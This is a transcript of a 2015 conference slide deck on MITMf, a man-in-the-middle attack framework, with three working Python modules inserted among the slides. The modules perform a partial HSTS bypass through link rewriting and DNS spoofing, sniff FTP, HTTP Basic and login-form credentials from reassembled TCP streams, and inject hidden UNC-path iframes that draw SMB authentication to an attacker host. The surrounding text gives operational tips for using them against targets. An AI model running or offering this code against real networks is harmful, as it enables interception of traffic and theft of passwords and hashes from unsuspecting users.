MITMf BHASIA 2015
Transcript of MITMf BHASIA 2015
The swiss-army knife
for Man-In-The-Middle Attacks
Contributed to the Veil-Framework, Kali NetHunter and more...
So why do we need another MITM tool?
Stuck in dependency hell
Not really designed to be an attack platform
Good for MITM
Unreliable when modifying traffic
Not easily extendible
Out of date
Too low level
Never got this to work properly
GUI seems broken
Do we even need a GUI?
How did this get started?
I JUST WANT SOMETHING TO RELIABLY INJECT IFRAMES!!!!!
So I Google'd like there was no tomorrow until I came across this:
I feel your pain bro...
Created by Ben Schmidt (@_supernothing)
Buy him a drink!
For those wondering, it stands for: Super Effective Recorder of Gathered Inputs and Outputs
A modified version of Moxie Marlinspike's SSLstrip tool
Hooks core functions in SSLstrip to modify traffic
Extremely easy to extend and build upon
So problem solved right?
Well not really...
A lot of the plugins relied on external tools (e.g. Ettercap, Metasploit, etc.)
Some plugins were very limited in their functionality and were a bit outdated
Lots of bugs to squash
Weird name but sounds promising!
What I wanted out of it
No reliance on external tools
Verbosity and logging
Minimize dependencies as much as possible (I truly tried..)
BeEF and Metasploit integration via their respective APIs and RPC interfaces
Learn from other projects' mistakes!
Originally used Ettercap
Completely re-written, now uses Scapy
Added support for ICMP, ARP req, ARP rep, DHCP
Supports DNS tampering (DNS spoofing on steroids)
When DHCP spoofing, it can also exploit the ShellShock vuln!
Written by @rubenthijssen (Thanks man!)
Replaces strings in HTML content
Injects a JS script to enumerate all browser plugins
Uses PluginDetect to precisely get the installed Java plugin version
Uses the BrowserProfiler plugin to enumerate the Java Plugin version
Connects to Metasploit using its MSGRPC interface
Uses SpiderLabs' msfrpc to talk to Metasploit; the original code had a bug, fixed it, you can find it here
Automatically sets up correct exploits, and injects iframes to trigger them
Born out of frustration from using the beef_injection_framework
Automatically injects BeEF hooks
for interfacing with BeEF's RESTfulAPI
Fingerprints OS, Browser and runs modules specified in the config file
Let's pause for a moment to understand how cool this is
Huge shout-out to @midnite_runr
Uses BDFactory to transparently "patch" executables going over HTTP
You can check out BDFactory at:
The plugin uses code from BDFproxy:
Modified to work somewhat on mobile devices
Responder integration into MITMf brings the framework to a whole new level
NBT-NS/LLMNR spoofing, acting as a rogue WPAD server and more!
Shout out to Laurent Gaffie for letting me do this!
Uses Leonardo Nve's technique for partially bypassing HSTS as demonstrated last year at BHAsia
(buy him a drink!)
App Cache Poison
Implements Krzysztof Kotowicz (@kkotowicz) response tampering attacks
Places web pages in the browser's long-lasting HTML5 AppCache so that the browser keeps receiving the modified page even when no longer MITM'd
For the lulz
Flips images 180 degrees
Gahhh! Voodoo?? No...
Returns redirect to
DNS request gets intercepted and
is mirrored to
We then re-write all links to the alternate domain
Client continues in plain-text since browser has no HSTS setting for
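The two halves of the partial HSTS bypass sketched on the slides above (rewrite https:// links to a host the browser has no HSTS entry for, then answer DNS for that host with the real site's address), as an added example that is not MITMf's or SSLstrip+'s own code. The "w" prefix ("www.example.com" becomes "wwww.example.com"), the example.com hostnames and the 203.0.113.10 address are assumptions; the last function shows the check that matters in practice: a parent entry with includeSubDomains (or a preload entry) covers the alternate name too, which is why the bypass is only partial.

```python
import re


class HstsBypass:
    """Proxy-side bookkeeping for the SSLstrip+-style partial HSTS bypass.

    Assumption (not from the slides): the alternate host is built by
    prefixing one letter, so "www.example.com" -> "wwww.example.com".
    The mapping is recorded so the DNS side can reverse it exactly.
    """

    URL_RE = re.compile(r"https://([A-Za-z0-9.-]+)")

    def __init__(self, prefix="w"):
        self.prefix = prefix
        self.alt_to_real = {}

    def alt_host(self, host):
        alt = self.prefix + host
        self.alt_to_real[alt] = host
        return alt

    def rewrite(self, text):
        """Rewrite every https:// URL in a body or Location header to
        plain http:// on the alternate host."""
        return self.URL_RE.sub(lambda m: "http://" + self.alt_host(m.group(1)), text)

    def resolve(self, qname, real_lookup):
        """DNS side: a query for the alternate name is answered with the
        real host's address; anything else passes through untouched."""
        return real_lookup(self.alt_to_real.get(qname, qname))


def hsts_protects(hsts_cache, host):
    """Does a browser HSTS cache force HTTPS for `host`?

    hsts_cache maps a host to its includeSubDomains flag. The alternate
    name escapes an exact entry for www.example.com, but not an
    example.com entry that carries includeSubDomains.
    """
    if host in hsts_cache:
        return True
    labels = host.split(".")
    for i in range(1, len(labels)):
        if hsts_cache.get(".".join(labels[i:]), False):
            return True
    return False


if __name__ == "__main__":
    bp = HstsBypass()
    # constructed redirect and body, not a captured response
    print(bp.rewrite("https://www.example.com/login"))
    print(bp.rewrite('<a href="https://www.example.com/a">x</a> '
                     '<a href="https://login.example.com/b">y</a>'))
    fake_dns = {"www.example.com": "203.0.113.10"}
    print(bp.resolve("wwww.example.com", lambda h: fake_dns[h]))
    # the caveat: an includeSubDomains entry on the parent defeats the trick
    print(hsts_protects({"www.example.com": False}, "wwww.example.com"))
    print(hsts_protects({"example.com": True}, "wwww.example.com"))
```

The same object serves both the HTTP proxy (rewrite) and the DNS spoofer (resolve), which is the point of recording the mapping instead of guessing the prefix back. Before relying on the bypass against a target, run its hostname through the HSTS check with the preload list loaded; a preloaded parent with includeSubDomains means the browser will upgrade the alternate host too.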
A port of Dan McInerney's (@DanHMcInerney) Net-Creds script
Sniffs passwords, hashes and search engine queries
TCP Re-Assembly aware
Doesn't rely on ports for service identification
Currently supports: FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (over every supported carrier protocol: HTTP, SMB, LDAP, etc.) and Kerberos
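What "TCP re-assembly aware" and "doesn't rely on ports" mean in practice, as an added example that is not Net-Creds' or MITMf's code: client payloads are glued together per flow before matching, so a PASS command split across two segments is still caught, and the protocol is recognised from content, so an FTP login on port 2121 and a Basic-auth header on port 8080 are both found. The packets, addresses and credentials below are constructed; the three parsers (FTP, HTTP Basic, HTTP form POST) are a subset chosen for illustration.

```python
import base64
import re
from collections import defaultdict
from urllib.parse import parse_qs


class StreamReassembler:
    """Concatenate client->server payloads per flow (src, sport, dst, dport)."""

    def __init__(self):
        self.buffers = defaultdict(bytes)

    def feed(self, flow, payload):
        self.buffers[flow] += payload
        return self.buffers[flow]


def parse_ftp(data):
    """USER/PASS pair anywhere in the reassembled stream, whatever the port."""
    user = None
    for line in data.split(b"\r\n"):
        if line.startswith(b"USER "):
            user = line[5:].decode(errors="replace")
        elif line.startswith(b"PASS ") and user:
            return ("ftp", user, line[5:].decode(errors="replace"))
    return None


BASIC_RE = re.compile(rb"Authorization: Basic ([A-Za-z0-9+/=]+)", re.I)


def parse_http_basic(data):
    m = BASIC_RE.search(data)
    if not m:
        return None
    try:
        user, _, pw = base64.b64decode(m.group(1)).partition(b":")
    except ValueError:  # binascii.Error is a ValueError
        return None
    return ("http-basic", user.decode(errors="replace"), pw.decode(errors="replace"))


def parse_http_form(data):
    """Form login: first request in the stream is a urlencoded POST whose
    body has a user-ish and a password-ish field."""
    if not data.startswith(b"POST "):
        return None
    head, sep, body = data.partition(b"\r\n\r\n")
    if not sep or b"application/x-www-form-urlencoded" not in head.lower():
        return None
    fields = parse_qs(body.decode(errors="replace"))
    user = next((v[0] for k, v in fields.items() if re.search(r"user|login|email", k, re.I)), None)
    pw = next((v[0] for k, v in fields.items() if re.search(r"pass|pwd", k, re.I)), None)
    return ("http-form", user, pw) if user and pw else None


PARSERS = (parse_ftp, parse_http_basic, parse_http_form)


def extract(segments):
    """segments: (flow, payload) tuples in capture order. Every parser runs
    on every stream; the port number is never consulted."""
    rs = StreamReassembler()
    found, seen = [], set()
    for flow, payload in segments:
        data = rs.feed(flow, payload)
        for parser in PARSERS:
            cred = parser(data)
            if cred and (flow, cred) not in seen:
                seen.add((flow, cred))
                found.append(cred)
    return found


# Constructed packets, not a real capture. FTP runs on 2121 and its PASS
# line is split across two segments; Basic auth is on 8080.
FTP = ("10.0.0.5", 40001, "10.0.0.9", 2121)
SAMPLE = [
    (FTP, b"USER alice\r\n"),
    (FTP, b"PAS"),
    (FTP, b"S s3cret\r\n"),
    (("10.0.0.5", 40002, "10.0.0.9", 8080),
     b"GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic Ym9iOmh1bnRlcjI=\r\n\r\n"),
    (("10.0.0.5", 40003, "10.0.0.9", 80),
     b"POST /login HTTP/1.1\r\nHost: intranet\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 26\r\n\r\n"
     b"username=carol&password=pw"),
]

if __name__ == "__main__":
    for proto, user, pw in extract(SAMPLE):
        print("%-10s %s:%s" % (proto, user, pw))
```

Feeding the three FTP segments one at a time shows why per-packet matching misses logins: after the second segment the buffer ends in `PAS`, and only the reassembled stream yields the pair. The `seen` set keeps later packets in the same flow from reporting the same credential again.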
But Dude! I want some shells ! <3
I got you covered!
Injects anything you want into HTML!
Looking into the crystal ball...
Evilgrade and Snarf integration
Actual SSL/TLS support
SSLsplit like functionality
MITM RDP connections (almost done)
More protocol level attacks (Yersinia)
More HSTS bypasses
Automatically stores captured cookies in a Firefox profile, uses code from Firelamb:
Alternatively can send the cookies to the "Mallory cookie injector" Browser Extension
Injects Iframes with UNC paths to evoke SMB challenge-response attempts
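The injection step behind both the "inject anything into HTML" plugin and the UNC-path iframe above, as an added example that is not MITMf's code. It shows the checks a reliable injector needs: only touch text/html, leave compressed bodies alone, insert once before `</body>` whatever its case, and fix Content-Length so the client does not truncate the page. The exact iframe markup, the share and file names and the 10.0.0.1 address are assumptions; that a UNC source makes Windows browsers start an SMB challenge-response to that host is the slide's claim, not something this code can verify.

```python
import re

BODY_CLOSE = re.compile(rb"</body\s*>", re.I)
HTML_CLOSE = re.compile(rb"</html\s*>", re.I)


def unc_trap_payload(host, share="share", name="trap.png"):
    """Hidden iframe whose src is a UNC path on the attacker's host.
    Markup is an assumption; the slide only says 'iframes with UNC paths'."""
    unc = "\\\\%s\\%s\\%s" % (host, share, name)
    return ('<iframe src="%s" style="display:none"></iframe>' % unc).encode()


def inject_html(body, payload):
    """Insert payload once, just before </body> (or </html>, or at the end).
    Returns (new_body, injected)."""
    if payload in body:
        return body, False
    for pattern in (BODY_CLOSE, HTML_CLOSE):
        m = pattern.search(body)
        if m:
            return body[:m.start()] + payload + body[m.start():], True
    return body + payload, True


def inject_response(headers, body, payload):
    """headers: dict of lowercase header name -> value for one HTTP response.
    Skips non-HTML and compressed bodies (decompress first, or strip
    Accept-Encoding from the request so the server never compresses).
    Updates Content-Length when present; chunked responses carry no length."""
    if not headers.get("content-type", "").lower().startswith("text/html"):
        return headers, body, False
    if headers.get("content-encoding", "identity").lower() != "identity":
        return headers, body, False
    new_body, done = inject_html(body, payload)
    if done and "content-length" in headers:
        headers = dict(headers, **{"content-length": str(len(new_body))})
    return headers, new_body, done


# constructed response, not a capture; note the upper-case </BODY>
SAMPLE_HEADERS = {"content-type": "text/html; charset=utf-8", "content-length": "68"}
SAMPLE_BODY = b"<html><head><title>hi</title></head><body><p>hello</p></BODY></html>"

if __name__ == "__main__":
    payload = unc_trap_payload("10.0.0.1")
    hdrs, body, done = inject_response(SAMPLE_HEADERS, SAMPLE_BODY, payload)
    print(done, hdrs["content-length"])
    print(body.decode())
```

Running the same response through twice injects nothing the second time, and a response with `content-encoding: gzip` is returned untouched; both are the cases that make naive "modify the traffic" proxies unreliable, which is the complaint on the early slides.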